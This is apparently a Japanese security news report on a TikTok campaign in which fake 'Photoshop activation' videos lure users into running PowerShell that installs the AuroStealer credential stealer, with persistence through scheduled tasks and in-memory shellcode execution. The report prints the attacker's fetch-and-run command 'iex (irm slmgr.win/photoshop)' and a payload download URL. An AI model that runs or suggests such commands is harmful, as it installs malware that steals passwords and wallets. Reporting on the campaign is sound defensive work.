はじめに:TikTokを悪用した新たな脅威
サイバー攻撃者がTikTokの広範なリーチを悪用し、一見無害に見える動画を通じてユーザーを騙し、マルウェアを実行させる新たなキャンペーンが確認されました。この手口では、攻撃者は「無料のPhotoshopアクティベーションツール」の提供者を装い、視聴者に対し、管理者権限でPowerShellを開き、特定のコマンドを実行するよう促します。
攻撃の手口:悪意あるPowerShellコマンド
攻撃者が提示するコマンドは以下の通りです。
powershell iex (irm slmgr.win/photoshop)
このコマンドは、Invoke-Expression (iex) を使用して、Invoke-RestMethod (irm) によって悪意あるホストからフェッチされたスクリプトを実行します。この手法は、ユーザーがMicrosoftのブログでコードをクリックして実行させ、マルウェアのインストールに誘導する「ClickFix」のソーシャルエンジニアリングシナリオと類似しています。
マルウェアの段階:AuroStealerと永続化
提供されたリンクにアクセスすると、被害者はPowerShellペイロード(SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23)を受け取ります。このペイロードは、現在のVirusTotal検出率が17/63と低く、その新規性と回避能力を示しています。
最初のスクリプトが実行されると、https://file-epq.pages.dev/updater.exe に接続し、次の段階のマルウェアであるUpdater.exe(SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8)をダウンロードします。分析の結果、このバイナリは、保存されたブラウザのパスワードや仮想通貨ウォレットを窃取することで知られるクレデンシャルハーベスティング型トロイの木馬、AuroStealerであることが判明しました。
永続性を維持するため、PowerShellスクリプトは正規の更新タスク名(例:AdobeUpdateTask、WindowsUpdateCheck)のリストからランダムにタスク名を選択します。その後、隠しウィンドウでPowerShellを起動し、実行ポリシーをバイパスするスケジュールタスクを作成し、ユーザーログオン時にUpdater.exeが疑われることなく実行されるようにします。正規のタスク名を使用することで、悪意ある永続化が通常のシステム動作に溶け込み、検出を回避します。
高度な回避技術:自己コンパイルとメモリ内実行
AuroStealerの段階に続き、さらにsource.exe(SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)というペイロードが取得され、起動されます。このバイナリは、高度な自己コンパイル型マルウェア技術を採用しています。実行中に、.NETコンパイラ csc.exe を呼び出し、一時的な .cmdline ファイルに保存されたソースコードをコンパイルします。
コンパイルされたクラスには、VirtualAlloc、CreateThread、WaitForSingleObject のP/Invoke宣言が含まれており、メモリの割り当て、プロセスへのシェルコードの直接注入、実行のためのスレッドの生成、そして無期限の待機を可能にします。これにより、ディスクに触れることなく、完全にメモリ内でペイロードが実行されます。このようなオンデマンドコンパイルは、最終的な悪意あるコードが一時的なメモリ内にのみ存在するため、静的解析や検出を困難にします。
広がる脅威と対策
研究者たちは、同じキャンペーンで「Officeのアクティベート」や「Windowsのロック解除」など、異なるソフトウェアを装ったTikTok動画も確認しており、攻撃者がソーシャルエンジニアリングのテーマを繰り返し変更してリーチを広げていることを示しています。
このキャンペーンは、サイバー犯罪者がショートフォーム動画プラットフォームを悪用し、PowerShellを介して自己コンパイル型、メモリ内実行型マルウェアを拡散させるという、進化する戦術を浮き彫りにしています。ユーザーは、未検証のソースからのターミナルコマンドを絶対に実行すべきではありません。また、プラットフォームは、潜在的に危険な操作を促す指示がある場合に、視聴者に警告を発することを検討すべきです。攻撃者が革新を続ける中、セキュリティ意識の向上と堅牢なエンドポイント防御が、これらの新たな脅威に対する最善の防御策となります。